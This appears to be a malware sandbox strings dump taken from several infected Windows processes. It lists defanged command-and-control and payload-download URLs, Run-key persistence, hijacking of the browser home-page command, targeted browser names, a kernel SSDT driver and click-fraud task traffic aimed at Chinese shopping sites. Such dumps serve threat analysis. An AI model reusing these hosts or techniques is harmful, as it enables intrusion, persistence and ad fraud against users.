GET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm

WS2_32.dll

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyExA

ADVAPI32.dll

SHELL32.dll

MSVCRT.dll

_acmdln

iphlpapi.dll

\Program Files\Internet Explorer\iexplore.exe

%s %s %s

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)

Host: %s:%d

Host: %s

User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/xKSYH

Referer: hXXp://%s:80/hXXp://%s

%s %s%s

User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE AtAtI)

User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

3577.myzmnet.com:3577

\??\%s\%c%c%s

\??\%s\%s

%s\%s

kernel32.DLL

ddd

SOFTWARE\Microsoft\Windows NT\Curre

svchost.exe_1884:

`.rsrc

?456789:;<=

!"#$%&'()* ,-./0123

inflate 1.1.3 Copyright 1995-1998 Mark Adler

ADVAPI32.dll

S2_32.dll

le32.dll

flow_apikey_xh

chrome.exe

hXXp://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx

{"exec":"getflows","execCount":"8","userid":"%s","userip":"%s"}

parems=%s

task_url":"

{"data":[%s],"code":"%s","src":"%s","datefirst":"%s","exec":"taskcomplete","userid":"%s","version":"%s"}

\chrome.exe

dwError: %d

%s%s -URL{%s} -REF{%s} -NAV{%d} -STY{%d} -PXY{%s}

{"task_id":"%s","task_o_id":"%s","task_result":"%s","user_ip":"%s"}

hXXp://VVV.ip138.com

.tmall.com

.taobao.com

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; EmbeddedWB 14.52 from: hXXp://VVV.bsalsa.com/ EmbeddedWB 14.52; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; Alexa Toolbar)

{"userip":"%s","code":"%s","src":"%s","datefirst":"%s","exec":"transfer_clients","userid":"%s"}

\\.\PhysicalDrive0

iphlpapi.dll

hXXp://wangbao.6299.cc/xc.txt

sdfadfwefawCOverbearingWebAppefaefaf

CWebBrowser2

::WriteFile failed ("%s").

::GetFileSize failed ("%s").

OpenFile (::CreateFile) failed ("%s").

::HttpEndRequest failed.

::HttpSendRequestEx failed.

::HttpSendRequest failed.

::HttpAddRequestHeaders failed.

::HttpOpenRequest failed.

::HttpQueryInfo failed.

The file (%s) aleady exists.

The encoded URL is not valid.

The port number is not valid.

The requested URL is not a valid URL.

HTTP/1.1

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

hXXps://

hXXp://

Mozilla/4.0 (compatible)

error:%d

Mdd

Host: %s

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

.text

`.rdata

@.data

.rsrc

H SSh

MFC42.DLL

MSVCRT.dll

_acmdln

KERNEL32.dll

GetKeyState

GetAsyncKeyState

USER32.dll

SHELL32.dll

ole32.dll

OLEAUT32.dll

urlmon.dll

MSVCP60.dll

WININET.dll

WINMM.dll

VERSION.dll

IMAGEHLP.dll

TbViewer.exe

hXXp://auction1.paipai.com/

.paipai.com

hXXp://detail.tmall.com/item.htm?

hXXp://ju.mmstat.com/?url=hXXp://item.taobao.com/item.htm?

hXXp://item.taobao.com/item.htm?

%d/%d

TbViewer.Document

hXXp://search1.paipai.com/cgi-bin/comm_search1?KeyWord={KEYWORD}&sDefKeyword=&sClassid=0&shoptype=&searchType=0&PTAG=20084.2.2&as=1

hXXp://s.1688.com/selloffer/offer_search.htm?keywords={KEYWORD}&n=y&categoryId=

.1688.com

hXXp://s.taobao.com/search?q={KEYWORD}&commend=all&ssid=s5-e&search_type=item&sourceId=tb.index&initiative_id=tbindexz_{YMD}

{KEYWORD}

ddd

-URL{

winmm.dll

DSound.dll

%s=%s

https

hXXp://VVV.taobao.com/webww

hXXp://amos1.taobao.com

hXXp://sighttp.qq.com

hXXp://wpa.qq.com

.gov.cn

.org.cn

.net.cn

.com.cn

<a href="%s" target="%s">%s</a>

!/.vv;'4FUq{}kJ#

.no\B=7wS]

InternetOpenUrlA

HttpQueryInfoA

HttpOpenRequestA

HttpAddRequestHeadersA

HttpSendRequestA

HttpEndRequestA

KERNEL32.DLL

.The file (%s) aleady exists.

OverbearingWeb

OverbearingWeb 1.0

{8856F961-340A-11D0-A96B-00C04FD705A2}

1, 0, 0, 1

TbViewer.EXE

OverbearingWeb(&A)...

OverbearingWeb Microsoft

OverbearingWeb

OverbearingWeb.EXE

OverbearingWeb

svchost.exe_1884_rwx_00400000_0002B000:

`.rsrc

?456789:;<=

!"#$%&'()* ,-./0123

inflate 1.1.3 Copyright 1995-1998 Mark Adler

ADVAPI32.dll

S2_32.dll

le32.dll

flow_apikey_xh

chrome.exe

hXXp://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx

{"exec":"getflows","execCount":"8","userid":"%s","userip":"%s"}

parems=%s

task_url":"

{"data":[%s],"code":"%s","src":"%s","datefirst":"%s","exec":"taskcomplete","userid":"%s","version":"%s"}

\chrome.exe

dwError: %d

%s%s -URL{%s} -REF{%s} -NAV{%d} -STY{%d} -PXY{%s}

{"task_id":"%s","task_o_id":"%s","task_result":"%s","user_ip":"%s"}

hXXp://VVV.ip138.com

.tmall.com

.taobao.com

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; EmbeddedWB 14.52 from: hXXp://VVV.bsalsa.com/ EmbeddedWB 14.52; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; Alexa Toolbar)

{"userip":"%s","code":"%s","src":"%s","datefirst":"%s","exec":"transfer_clients","userid":"%s"}

\\.\PhysicalDrive0

iphlpapi.dll

hXXp://wangbao.6299.cc/xc.txt

sdfadfwefawCOverbearingWebAppefaefaf

CWebBrowser2

::WriteFile failed ("%s").

::GetFileSize failed ("%s").

OpenFile (::CreateFile) failed ("%s").

::HttpEndRequest failed.

::HttpSendRequestEx failed.

::HttpSendRequest failed.

::HttpAddRequestHeaders failed.

::HttpOpenRequest failed.

::HttpQueryInfo failed.

The file (%s) aleady exists.

The encoded URL is not valid.

The port number is not valid.

The requested URL is not a valid URL.

HTTP/1.1

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

hXXps://

hXXp://

Mozilla/4.0 (compatible)

error:%d

Mdd

Host: %s

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

.text

`.rdata

@.data

.rsrc

H SSh

MFC42.DLL

MSVCRT.dll

_acmdln

KERNEL32.dll

GetKeyState

GetAsyncKeyState

USER32.dll

SHELL32.dll

ole32.dll

OLEAUT32.dll

urlmon.dll

MSVCP60.dll

WININET.dll

WINMM.dll

VERSION.dll

IMAGEHLP.dll

TbViewer.exe

hXXp://auction1.paipai.com/

.paipai.com

hXXp://detail.tmall.com/item.htm?

hXXp://ju.mmstat.com/?url=hXXp://item.taobao.com/item.htm?

hXXp://item.taobao.com/item.htm?

%d/%d

TbViewer.Document

hXXp://search1.paipai.com/cgi-bin/comm_search1?KeyWord={KEYWORD}&sDefKeyword=&sClassid=0&shoptype=&searchType=0&PTAG=20084.2.2&as=1

hXXp://s.1688.com/selloffer/offer_search.htm?keywords={KEYWORD}&n=y&categoryId=

.1688.com

hXXp://s.taobao.com/search?q={KEYWORD}&commend=all&ssid=s5-e&search_type=item&sourceId=tb.index&initiative_id=tbindexz_{YMD}

{KEYWORD}

ddd

-URL{

winmm.dll

DSound.dll

%s=%s

https

hXXp://VVV.taobao.com/webww

hXXp://amos1.taobao.com

hXXp://sighttp.qq.com

hXXp://wpa.qq.com

.gov.cn

.org.cn

.net.cn

.com.cn

<a href="%s" target="%s">%s</a>

!/.vv;'4FUq{}kJ#

.no\B=7wS]

InternetOpenUrlA

HttpQueryInfoA

HttpOpenRequestA

HttpAddRequestHeadersA

HttpSendRequestA

HttpEndRequestA

KERNEL32.DLL

.The file (%s) aleady exists.

OverbearingWeb

OverbearingWeb 1.0

{8856F961-340A-11D0-A96B-00C04FD705A2}

1, 0, 0, 1

TbViewer.EXE

OverbearingWeb(&A)...

OverbearingWeb Microsoft

OverbearingWeb

OverbearingWeb.EXE

OverbearingWeb

lsass.exe_1924:

.text

`.rdata

@.data

.rsrc

GET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm

WS2_32.dll

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyExA

ADVAPI32.dll

SHELL32.dll

MSVCRT.dll

_acmdln

iphlpapi.dll

\Program Files\Internet Explorer\iexplore.exe

%s %s %s

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)

Host: %s:%d

Host: %s

User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/xKSYH

Referer: hXXp://%s:80/hXXp://%s

%s %s%s

User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE AtAtI)

User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

3544.myzmnet.com:3544

\??\%s\%c%c%s

\??\%s\%s

%s\%s

kernel32.DLL

ddd

SOFTWARE\Microsoft\Windows NT\Curre

explorer.exe_2076:

.text

`.rdata

@.data

.rsrc

GET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm

WS2_32.dll

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyExA

ADVAPI32.dll

SHELL32.dll

MSVCRT.dll

_acmdln

iphlpapi.dll

\Program Files\Internet Explorer\iexplore.exe

%s %s %s

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)

Host: %s:%d

Host: %s

User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/xKSYH

Referer: hXXp://%s:80/hXXp://%s

%s %s%s

User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE AtAtI)

User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

3599.myzmnet.com:3599

\??\%s\%c%c%s

\??\%s\%s

%s\%s

kernel32.DLL

ddd

SOFTWARE\Microsoft\Windows NT\Curre

kisse.exe_2240:

.rsrc

]2014:11

Adobe Photoshop CS Windows

2014:11:18 03:11:56

urlTEXT

MsgeTEXT

hXXp://ns.adobe.com/xap/1.0/

<rdf:RDF xmlns:rdf='hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#' xmlns:iX='hXXp://ns.adobe.com/iX/1.0/'>

<rdf:Description rdf:about='uuid:1f4cff81-6e8d-11e4-911b-8788e106da8f'

xmlns:exif='hXXp://ns.adobe.com/exif/1.0/'>

xmlns:pdf='hXXp://ns.adobe.com/pdf/1.3/'>

xmlns:photoshop='hXXp://ns.adobe.com/photoshop/1.0/'>

xmlns:tiff='hXXp://ns.adobe.com/tiff/1.0/'>

xmlns:xap='hXXp://ns.adobe.com/xap/1.0/'>

<xap:CreatorTool>Adobe Photoshop CS Windows</xap:CreatorTool>

xmlns:xapMM='hXXp://ns.adobe.com/xap/1.0/mm/'>

<xapMM:DocumentID>adobe:docid:photoshop:8075dc53-6e86-11e4-86e8-b24630cb66fb</xapMM:DocumentID>

xmlns:dc='hXXp://purl.org/dc/elements/1.1/'>

IEC hXXp://VVV.iec.ch

.IEC 61966-2.1 Default RGB colour space - sRGB

CRT curv

M%DsF

VB5!6&vb6chs.dll

shdocvw.dll

SHDocVwCtl.WebBrowser

WebBrowser

%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB

DeleteUrlCacheEntryA

urlmon

URLDownloadToFileA

shell32.dll

ShellExecuteA

WinExec

kernel32.dll

GetWindowsDirectoryA

oleaut32.dll

iphlpapi.dll

advapi32.dll

RegCreateKeyA

RegOpenKeyA

%System%\shdocvw.oca

RegDeleteKeyA

RegCloseKey

RegEnumKeyExA

CreateUrlShortCut

VBA6.DLL

kernel32.dll

CreatePipe

2014:11:18 02:47:36

<rdf:Description rdf:about='uuid:32e14f8b-6e8a-11e4-86e8-b24630cb66fb'

<xapMM:DocumentID>adobe:docid:photoshop:abcde61d-6e87-11e4-86e8-b24630cb66fb</xapMM:DocumentID>

.text

`.data

Di^%Xa

KERNEL32.DLL

MSVBVM60.DLL

hXXp://124.228.91.31:61/cc.txt

hXXp://112.83.192.9:61/cc.txt

61.147.113.68,333,/c.txt

hXXp://124.228.91.31:62/hhtj.htm

hXXp://124.228.91.31:61/hh.txt

hXXp://112.83.192.9:61/hh.txt

61.147.113.68,333,/host.txt

hXXp://124.228.91.31:61/htj.htm

hXXp://124.228.91.31:261/2a03y04.htm?id=02&mac=[MAC]

hXXp://124.228.91.31:61/tt.txt

hXXp://112.83.192.9:61/tt.txt

61.147.113.68,333,/t.txt

hXXp://124.228.91.31:61/hhtj.htm

hXXp://124.228.91.31:91

CHROME.EXE|IEXPLORE.EXE|360SE.EXE|TTRAVELER.EXE|SOGOUEXPLORER.EXE|liebao.exe|MAXTHON.EXE|baidubrowser.exe|qqbrowser.exe|FIREFOX.EXE|CORAL.EXE|360CHROME.EXE|TAOBROWSER.EXE|OPERA.EXE|SAFARI.EXE|NETSCAPE.EXE|WANKES.EXE|THEWORLD.EXE

explorer.exe

QQ.exe

UrlGet

UrlGetToArray

UrlGetToByteArray

Software\Microsoft\Windows\CurrentVersion\Run

ipconfig.exe /all

\AutoDns.cmd

SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces

\TempFile.txt

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel

{871C5380-42A0-1069-A2EA-08002B30309D}

Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu

CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command

"%Program Files%\Internet Explorer\iexplore.exe" "hXXp://124.228.91.31:91"

\*.lnk

QQNews02.exe

kisse.exe_2240_rwx_00401000_00028000:

Adobe Photoshop CS Windows

2014:11:18 03:11:56

urlTEXT

MsgeTEXT

hXXp://ns.adobe.com/xap/1.0/

<rdf:RDF xmlns:rdf='hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#' xmlns:iX='hXXp://ns.adobe.com/iX/1.0/'>

<rdf:Description rdf:about='uuid:1f4cff81-6e8d-11e4-911b-8788e106da8f'

xmlns:exif='hXXp://ns.adobe.com/exif/1.0/'>

xmlns:pdf='hXXp://ns.adobe.com/pdf/1.3/'>

xmlns:photoshop='hXXp://ns.adobe.com/photoshop/1.0/'>

xmlns:tiff='hXXp://ns.adobe.com/tiff/1.0/'>

xmlns:xap='hXXp://ns.adobe.com/xap/1.0/'>

<xap:CreatorTool>Adobe Photoshop CS Windows</xap:CreatorTool>

xmlns:xapMM='hXXp://ns.adobe.com/xap/1.0/mm/'>

<xapMM:DocumentID>adobe:docid:photoshop:8075dc53-6e86-11e4-86e8-b24630cb66fb</xapMM:DocumentID>

xmlns:dc='hXXp://purl.org/dc/elements/1.1/'>

IEC hXXp://VVV.iec.ch

.IEC 61966-2.1 Default RGB colour space - sRGB

CRT curv

M%DsF

VB5!6&vb6chs.dll

shdocvw.dll

SHDocVwCtl.WebBrowser

WebBrowser

%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB

DeleteUrlCacheEntryA

urlmon

URLDownloadToFileA

shell32.dll

ShellExecuteA

WinExec

kernel32.dll

GetWindowsDirectoryA

oleaut32.dll

iphlpapi.dll

advapi32.dll

RegCreateKeyA

RegOpenKeyA

%System%\shdocvw.oca

RegDeleteKeyA

RegCloseKey

RegEnumKeyExA

CreateUrlShortCut

VBA6.DLL

kernel32.dll

CreatePipe

2014:11:18 02:47:36

<rdf:Description rdf:about='uuid:32e14f8b-6e8a-11e4-86e8-b24630cb66fb'

<xapMM:DocumentID>adobe:docid:photoshop:abcde61d-6e87-11e4-86e8-b24630cb66fb</xapMM:DocumentID>

.text

`.data

.rsrc

Di^%Xa

hXXp://124.228.91.31:61/cc.txt

hXXp://112.83.192.9:61/cc.txt

61.147.113.68,333,/c.txt

hXXp://124.228.91.31:62/hhtj.htm

hXXp://124.228.91.31:61/hh.txt

hXXp://112.83.192.9:61/hh.txt

61.147.113.68,333,/host.txt

hXXp://124.228.91.31:61/htj.htm

hXXp://124.228.91.31:261/2a03y04.htm?id=02&mac=[MAC]

hXXp://124.228.91.31:61/tt.txt

hXXp://112.83.192.9:61/tt.txt

61.147.113.68,333,/t.txt

hXXp://124.228.91.31:61/hhtj.htm

hXXp://124.228.91.31:91

CHROME.EXE|IEXPLORE.EXE|360SE.EXE|TTRAVELER.EXE|SOGOUEXPLORER.EXE|liebao.exe|MAXTHON.EXE|baidubrowser.exe|qqbrowser.exe|FIREFOX.EXE|CORAL.EXE|360CHROME.EXE|TAOBROWSER.EXE|OPERA.EXE|SAFARI.EXE|NETSCAPE.EXE|WANKES.EXE|THEWORLD.EXE

explorer.exe

QQ.exe

UrlGet

UrlGetToArray

UrlGetToByteArray

Software\Microsoft\Windows\CurrentVersion\Run

ipconfig.exe /all

\AutoDns.cmd

SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces

\TempFile.txt

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel

{871C5380-42A0-1069-A2EA-08002B30309D}

Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu

CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command

"%Program Files%\Internet Explorer\iexplore.exe" "hXXp://124.228.91.31:91"

\*.lnk

NOTEPAD.EXE_2604:

.text

`.data

.rsrc

comdlg32.dll

SHELL32.dll

WINSPOOL.DRV

COMCTL32.dll

msvcrt.dll

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

GDI32.dll

USER32.dll

notepad.chm

hhctrl.ocx

CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32

notepad.pdb

t%SSh

_acmdln

RegCloseKey

RegCreateKeyW

RegOpenKeyExA

SetViewportExtEx

GetKeyboardLayout

name="Microsoft.Windows.Shell.notepad"

version="5.1.0.0"

<description>Windows Shell</description>

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

&*$#$$#$*

MMMrMMM`MMMRMMMFMMM:MMM.MMM"MMM

*.txt

/.SETUP

Text Documents (*.txt)

%WinDir%\Helps\ielock.ini

5.1.2600.5512 (xpsp.080413-2105)

NOTEPAD.EXE

Windows

Operating System

5.1.2600.5512

notepad.hlp

You cannot quit Windows because the Save As dialog

dialog box, and then try quitting Windows again.

Common Dialog error (0xx)

Not enough memory available to complete this operation. Quit one or more applications to increase available memory, and then try again.KThe %% file is too large for Notepad.

Not a valid file name.MCannot create the %% file.

Make sure that the path and filename are correct.RCannot carry out the Word Wrap command because there is too much text in the file.

Page %d

Ln %d, Col %d

svchost.exe_3688:

.text

`.rdata

@.data

.rsrc

SSSh@4@

SSSh0:@

SSShP8@

t#SSSh

SSShp=@

SSSh >@

SSSh@C@

\$.up

WS2_32.dll

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

RegCloseKey

RegOpenKeyA

RegOpenKeyExA

ADVAPI32.dll

SHDeleteKeyA

SHLWAPI.dll

MSVCRT.dll

_acmdln

ShellExecuteA

SHELL32.dll

dnsapi.dll

\svchost.exe

kernel32.dll

InternetOpenUrlA

wininet.dll

c:\2.exe

GetUrlCacheEntryInfoA

URLDownloadToCacheFileA

urlmon.dll

Shell32.dll

h.rdata

H.data

.reloc

rtyutjgkjguityutuczxcvasdfawerrrwrw 0x%x

assdfasdfhjlkhjklyuioyuiodwe 0x%x

c:\winddk\demo\repairssdt\bin\i386\RepairSSDT.pdb

ntoskrnl.exe

>$>)>2>9>

relo type %d found at .%X

Possibly KiServiceLimit==X

0x%x 0xX

&KiServiceTable==X

ntdll.dll

\\.\Dark2118

\drivers\PCIDump.sys

lasrse.exe

cnzz.9ycj.com

kmon.dll

SYSTEM\CurrentControlSet\Services\%s

%s SP%d

%u.193.%d.%d

#%d<<<<<I@C<<<<<%s!

GET %s HTTP/1.1

Host: %s:%d

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)

Referer: hXXp://%s

hXXp://

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

Kernel32.dll

\Program Files\Internet Explorer\iexplore.exe

\explorer.exe

21.0.0.17

ravcopy.exe

668531044687500

svchost.exe_3568:

`.rsrc

u$SShe

SSSSh

File%d

CCmdTarget

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

MSWHEEL_ROLLMSG

MAPI32.DLL

MSH_SCROLL_LINES_MSG

CMDIChildWnd

CMDIFrameWnd

%*.*f

{X-X-X-XX-XXXXXX}

CNotSupportedException

CHttpConnection

CHttpFile

hXXp://

HTTP/1.0

WININET.DLL

GDI32.DLL

ddeexec

%s\ShellNew

%s\DefaultIcon

%s\shell\printto\%s

%s\shell\print\%s

%s\shell\open\%s

ole32.dll

Broken pipe

Inappropriate I/O control operation

Operation not permitted

__MSVCRT_HEAP_SELECT

user32.dll

ETAPI32.dll

DSound.dll

winmm.dll

\set.ini

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.612.1 Safari/534.15

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Maxthon/3.0)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/24.0

autoie.xml

window.open=null

refurl

\autoie.xml

\replace.xml

aquametron.com

it885.com.cn

wlkan.cn

fxxx114.com

niudoudou.com

floodad.com

hXXp://VVV.it885.com.cn/web/xml_lost_ad.asp?ad_url=

.PAVCInternetException@@

index.dat

desktop.ini

%s%d bytes

Element '%s' at offset %d not ended

End tag '%s' at offset %d does not match start tag '%s' at offset %d

No start tag for end tag '%s' at offset %d

%s at offset %d unterminated

Incorrect %s at offset %d

.?AVCCmdTarget@@

.PAVCException@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCUserException@@

.PAVCOleException@@

.PAVCObject@@

.PAVCOleDispatchException@@

.?AVCMDIFrameWnd@@

.?AVCMDIChildWnd@@

.PAVCArchiveException@@

.?AVCToolCmdUI@@

.?AVCStatusCmdUI@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.PAVCNotSupportedException@@

.?AVCNotSupportedException@@

.?AVCHttpConnection@@

.?AVCHttpFile@@

.PAVCResourceException@@

.PAVCFileException@@

zcÁ

windows

KERNEL32.DLL

%System%\svchost.exe

GetCPInfo

RegCreateKeyA

RegOpenKeyExA

RegCreateKeyExA

RegDeleteKeyA

RegOpenKeyA

RegCloseKey

GetViewportExtEx

ScaleViewportExtEx

SetViewportExtEx

OffsetViewportOrgEx

SetViewportOrgEx

UrlMkSetSessionOption

CreateDialogIndirectParamA

UnhookWindowsHookEx

GetKeyState

SetWindowsHookExA

EnumWindows

EnumDesktopWindows

EnumChildWindows

DeleteUrlCacheEntry

FindNextUrlCacheEntryA

FindFirstUrlCacheEntryA

HttpQueryInfoA

HttpSendRequestA

HttpOpenRequestA

InternetCanonicalizeUrlA

InternetCrackUrlA

.text

`.rdata

@.data

.rsrc

xKey

WUrlMkS)O

ADVAPI32.dll

COMCTL32.dll

comdlg32.dll

GDI32.dll

OLEAUT32.dll

oledlg.dll

OLEPRO32.DLL

SHELL32.dll

urlmon.dll

USER32.dll

WININET.dll

WINMM.dll

WINSPOOL.DRV

WSOCK32.dll

Load URL

Windows

(*.*)

1, 0, 0, 0

AuotIE.exe

AutoIE.exe

svchost.exe_3688_rwx_00400000_0000B000:

.text

`.rdata

@.data

.rsrc

SSSh@4@

SSSh0:@

SSShP8@

t#SSSh

SSShp=@

SSSh >@

SSSh@C@

\$.up

WS2_32.dll

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

RegCloseKey

RegOpenKeyA

RegOpenKeyExA

ADVAPI32.dll

SHDeleteKeyA

SHLWAPI.dll

MSVCRT.dll

_acmdln

ShellExecuteA

SHELL32.dll

